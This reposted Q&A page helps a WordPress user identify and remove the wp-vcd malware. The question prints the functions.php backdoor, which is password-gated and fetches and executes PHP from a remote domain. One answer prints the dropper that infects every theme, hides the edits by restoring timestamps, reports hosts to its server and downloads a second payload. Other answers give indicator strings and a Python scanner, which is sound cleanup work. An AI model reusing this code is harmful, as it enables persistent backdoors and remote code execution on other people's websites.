What is this code in my theme's functions.php?

This code appears in my theme's functions.php, and also in my child theme's. I've deleted it twice, but it comes back. What is it?

if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) {
    $div_code_name = "wp_vcd";
    switch ( $_REQUEST['action'] ) {
        case 'change_domain';
            if ( isset( $_REQUEST['newdomain'] ) ) {

                if ( ! empty( $_REQUEST['newdomain'] ) ) {
                    if ( $file = @file_get_contents( __FILE__ ) ) {
                        if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain ) ) {

                            $file = preg_replace( '/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file );
                            @file_put_contents( __FILE__, $file );
                            print "true";
                        }


                    }
                }
            }
            break;


        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die( "" );
}


if ( ! function_exists( 'theme_temp_setup' ) ) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[ REQUEST_URI ];
    if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
        if ( $tmpcontent = @file_get_contents( "http://www.dolsh/code4.php?i=" . $path ) ) {
            function theme_temp_setup( $phpCode ) {
                $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
                $handle   = fopen( $tmpfname, "w+" );
                fwrite( $handle, "<?php\n" . $phpCode );
                fclose( $handle );
                include $tmpfname;
                unlink( $tmpfname );

                return get_defined_vars();
            }

            extract( theme_temp_setup( $tmpcontent ) );
        }
    }
}
Asked Oct 1, 2017 at 19:55 by Topy; edited Oct 8, 2017 at 8:00 by Mostafa Soufi.
  • What theme are you using? – lukgoh Commented Oct 1, 2017 at 20:18
  • Please post the name of the theme. It is possible that your site is hacked; or the theme you're using is backdoored by the authors - hard to say which. One way to check is to see the theme's code if the backdoor is still there. In any case, you should get rid of that file and check deeper to see if other files are infected (in other ways) too. – Sas3 Commented Oct 2, 2017 at 2:35
  • Hi, I use the Boss theme. But the code appears in every theme, such as the twentyseventeen theme. The code has gone now, as I used Wordfence to scan and removed it. I think the problem derives from the plugins I use. – Topy Commented Oct 2, 2017 at 6:41

4 Answers

Your website has been hacked. This is malicious code that gets triggered from the outside, loading more malicious content from the 'www.dolsh' domain.

If the content comes back after you remove it, then you have hacked files somewhere else that will automatically rewrite functions.php any time a page is loaded. You need to find and clean up all infected files, and it is impossible to tell which files are infected without a detailed review of the website. Most infections like this spread into various areas to make sure they are hard to remove.

You should back up the database, and then reinstall WordPress from scratch, along with all the plugins you have and a theme that is not infected. It is possible that some plugin is the source of the infection, or the theme itself. If you have downloaded plugins or themes from some illegal website (offering premium plugins for free), that is the most likely source of the infection.

I used Wordfence to scan the files, and the scan shows these results:

  • The functions.php in the twentyseventeen theme also contains the same code as above.
  • In the wp-includes folder, there's a strange file "wp-vcd.php". The file contains the code below:

    <?php
    error_reporting(0);
    ini_set('display_errors', 0);

    // Base64-encoded copy of the functions.php injection (the blob itself was removed from this page).
    $install_code = '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';

    // Per-site backdoor password: md5 of the host name and the site's AUTH_SALT.
    $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
    $install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));

    $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

    $ping  = true;
    $ping2 = false;
    if ($list = scandir($themes)) {
        foreach ($list as $_) {
            if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
                // Remember the file's change time so the modification is harder to spot.
                $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
                if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
                    // Prepend the injection once per theme, keyed on the WP_V_CD marker string.
                    if (strpos($content, 'WP_V_CD') === false) {
                        $content = $install_code . $content;
                        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                        touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
                    } else {
                        $ping = false;
                    }
                }
            } else {
                // Same procedure one directory level deeper.
                $list2 = scandir($themes . DIRECTORY_SEPARATOR . $_);
                foreach ($list2 as $_2) {
                    if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                        $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
                        if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                            if (strpos($content, 'WP_V_CD') === false) {
                                $content = $install_code . $content;
                                @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $time);
                                $ping2 = true;
                            } else {
                                //$ping = false;
                            }
                        }
                    }
                }
            }
        }

        // Report the newly infected host to the remote server and drop a second file into wp-includes.
        if ($ping) {
            $content = @file_get_contents('http://www.dolsh/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
            @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.dolsh/admin.txt'));
        }

        if ($ping2) {
            $content = @file_get_contents('http://www.dolsh/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
            @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.dolsh/admin.txt'));
            //echo ABSPATH . 'wp-includes/class.wp.php';
        }
    }
    ?><?php error_reporting(0);?>
    
  • In the wp-includes folder, this code appears at the top in the post.php file.

     <?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php
    
  • In the wp-includes folder, there's a strange file "wp-feed" containing these lines:

      ::1
      127.0.0.1
    

Now, after I've removed the code from all the themes' functions.php and the related file, and removed the strange files, I've noticed that the code doesn't come back again.

This problem derives from the plugins I downloaded from websites that provide free plugins.

The code that you have shared points towards wp-vcd malware in your WordPress website. The main symptoms of wp-vcd malware are spam popups and spam URLs created on the website.

Some variants of the malicious codes have been seen to modify core WordPress files and also add new files in the /wp-includes directory.

  • The malware creates a backdoor which allows hackers to have access to your website for extended periods.
  • Hackers are able to exploit vulnerabilities in WordPress plugins and themes to upload the wp-vcd malware to vulnerable sites.

In the functions.php file within your theme, you would see some code similar to this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

Cleaning

Approach 1 – Search for files on the server that are usually infected with the wp-vcd hack

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.ph
  3. wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
  4. class.theme-modules.php (inside the theme folder)

Approach 2 – Search for string patterns that are found in infected malware files

  1. tmpcontentx
  2. function wp_temp_setupx
  3. wp-tmp.php
  4. derna.top/code.php
  5. stripos($tmpcontent, $wp_auth_key)

For reference: https://www.getastra/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/
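As an added example (not code from the question or from any of the answers), here is a small Python scanner that checks a WordPress tree for the indicators the answers list: the dropped files, the marker strings from "Approach 2" and from the posted code, and the mtime/ctime mismatch left behind by the dropper's touch() call. The fixture tree, the theme names and the max_skew threshold are constructed assumptions.

```python
import os, re, tempfile

# Indicators from the answers above: dropped files (relative to the root) and literal strings.
SUSPECT_FILES = ["wp-includes/wp-vcd.php", "wp-includes/wp-tmp.php", "wp-includes/class.wp.php"]
PATTERNS = ["WP_V_CD", "wp_vcd", "theme_temp_setup", "tmpcontentx", "wp_temp_setupx",
            "wp-tmp.php", "derna.top/code.php", "stripos($tmpcontent, $wp_auth_key)",
            "class.theme-modules.php", "class.plugin-modules.php", "wp-vcd.php"]
MARKER = re.compile("|".join(re.escape(p) for p in PATTERNS))

def scan_wordpress(root, max_skew=3600):
    """Return sorted (relative path, reason) findings for the WordPress tree at root."""
    findings = []
    for rel in SUSPECT_FILES:
        if os.path.exists(os.path.join(root, rel)):
            findings.append((rel, "known wp-vcd file present"))
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                hit = MARKER.search(fh.read().decode("utf-8", "replace"))
            if hit:
                findings.append((rel, "contains marker " + hit.group(0)))
            st = os.stat(path)
            # touch() restores mtime but cannot set ctime: ctime far newer than mtime = rewritten.
            if name == "functions.php" and st.st_ctime - st.st_mtime > max_skew:
                findings.append((rel, "ctime newer than mtime (timestamp restored)"))
    return sorted(findings)

def build_sample_site(root):
    """Constructed fixture reproducing the infection layout described on this page."""
    def write(rel, text, mtime=None):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
        if mtime is not None:  # same trick as touch($file, $time) in wp-vcd.php
            os.utime(path, (mtime, mtime))
    write("wp-content/themes/boss/functions.php",
          '<?php if (isset($_REQUEST["action"])) { $div_code_name = "wp_vcd"; } ?>', 1500000000)
    write("wp-content/themes/clean/functions.php", "<?php add_action('init', 'my_setup'); ?>")
    write("wp-includes/wp-vcd.php", "<?php if (strpos($content, 'WP_V_CD') === false) { } ?>")
    write("wp-includes/post.php", "<?php include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>")

def scan_sample_site():
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_wordpress(root)

if __name__ == "__main__":
    print(*scan_sample_site(), sep="\n")
```

Run it against a real install with scan_wordpress("/path/to/wordpress"); the ctime check is a heuristic (chmod or chown also bump ctime), so treat it as a lead to review, not proof by itself.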

If you downloaded premium plugins for free, please check whether they contain both of these files; be aware that these are the files behind this issue.

class.plugin-modules.php class.theme-modules.php

Before installation this file was 35 KB in size; once the theme/plugin is installed and activated, it moves its code into all the wp-includes folders in your hosting, so it keeps living hidden in the wp-includes of all your other sites.

Published by: admin. Please credit the source when reposting: http://www.yc00.com/questions/1745261889a4619247.html